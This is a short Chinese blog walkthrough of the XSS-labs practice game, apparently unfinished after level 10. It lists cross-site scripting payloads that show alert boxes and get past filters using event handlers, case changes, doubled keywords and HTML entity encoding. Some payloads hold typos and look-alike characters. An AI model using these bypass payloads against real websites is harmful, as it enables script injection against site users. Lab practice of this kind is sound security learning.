XSS-labs通关游戏

Level 1

Palyload:name=<script>alert(/test/)</script>

Level 2

Playload:keyword="><script>alert(/xss/)</script><"

 

Level 3

Palyload:keyword=' οnmοuseοver=’alert(/xss/)

 

Level 4

Palyload:keyword=" οnmοuseοver='alert(/xss/)'

 Level 5

Playload:“><a href=”javascript:alert:alert(/xss/)”>click</a>

Level 6

Playload:keyword=" ONmouseover='alert(/xss/)'

 Level 7

Playload:keyword=" oonnmouseover='alert(/xss/)'

Playlaod:keyword="><a hhrefref="javascscriptript:alert(/xss/)">click</a>

 

Level 8

Playload:keyword=java&#x73;cript:alert(/xss/)

Playload:keyword=java&#115;cript:alert(/xss/)      html实体编码绕过

 

Level 9

Playload:keyword=java&#115;cript:alert('http://www.baidu.com')

 

Level 10

Playload:t_sort="  type="botton" οnmοuseοver='alert(/xss/)'

               t_sort=click" type="button" οnclick="alert(/xss/)"

查看源码:

 

测试发现:

  

结果:

 

Level 11

Playload:

稍等,测试中。。。

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值